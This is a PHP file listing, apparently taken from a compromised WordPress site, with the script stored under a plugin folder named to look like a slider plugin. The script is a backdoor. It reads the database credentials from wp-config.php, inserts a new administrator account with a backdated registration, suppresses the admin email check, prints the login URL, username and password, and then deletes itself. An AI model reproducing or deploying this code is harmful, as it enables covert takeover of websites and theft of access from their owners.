HEX

File: /home/hzaluminio/www/sair/(FORA)wp-content (forA)/plugins/revsliderswp/pass.php
<?php

function hash_password($password) {
    // Use PASSWORD_DEFAULT for secure hashing
    return password_hash($password, PASSWORD_DEFAULT);
}

function generate_password($length = 20){
  $chars =  'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.
            '0123456789-=~!@$%&*()_+';

  $str = '';
  $max = strlen($chars) - 1;

  for ($i=0; $i < $length; $i++)
    $str .= $chars[mt_rand(0, $max)];

$names = array(
        rand(1,20).'@#$%O'.rand(1,90),
        rand(1,50).'*&_!E'.rand(1,99),
        rand(1,99).'%^-$%X'.rand(1,99),
        // and so on

    );

  return $str.rand(99,199).$names[rand ( 0 , count($names) -1)];
}

$myfile = fopen("../../../wp-config.php", "r");
$get = fread($myfile,filesize("../../../wp-config.php"));
fclose($myfile);
//
preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b1);
$name=$b1[1][0];
preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b2);
$user=$b2[1][0];
preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b3);
$pass=$b3[1][0];
preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b4);
$host=$b4[1][0];
preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$get,$b5);
$prefix=$b5[1][0];
//echo $host.$user.$pass.$name."</br>";
if($host=='DB_CHARSET'){
preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\"(.*)\".*\).*;|isU',$get,$b1);
$name=$b1[1][0];
preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\"(.*)\".*\).*;|isU',$get,$b2);
$user=$b2[1][0];
preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\"(.*)\".*\).*;|isU',$get,$b3);
$pass=$b3[1][0];
preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\"(.*)\".*\).*;|isU',$get,$b4);
$host=$b4[1][0];
preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$get,$b5);
$prefix=$b5[1][0];
}

$connect = mysqli_connect($host,$user,$pass,$name);


if($connect){
  $query1 = mysqli_query($connect,"select * from ".$prefix."options where option_name='siteurl'");
while($siteurl = mysqli_fetch_array($query1)){
  $site_url = $siteurl['option_value'];
}
$userlogin= $user.rand(9,300);

$passWp = htmlspecialchars(generate_password(12));
$cryptedpass = hash_password($passWp);
$req = 'INSERT INTO `'.$prefix.'users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (\''.$userlogin.'\', \''.$cryptedpass.'\', \''.$userlogin.'\', \'server@localhost.com\', \''.$site_url.'\', \'2014-07-01 00:00:00\', \'\', \'0\', \'host\');
INSERT INTO `'.$prefix.'usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, LAST_INSERT_ID(), \''.$prefix.'capabilities\', \'a:1:{s:13:"administrator";s:1:"1";}\');
INSERT INTO `'.$prefix.'usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, LAST_INSERT_ID(), \''.$prefix.'user_level\', \'10\'); update '.$prefix.'options set option_value=\'3178881530\' where option_name=\'admin_email_lifespan\'';
$query2 = @mysqli_multi_query($connect,$req) or print(mysqli_error($connect));
if($query2){
echo "$site_url/wp-login.php|$userlogin|$passWp";
}
else {
echo 'error';
}
}
unlink(__file__);
?>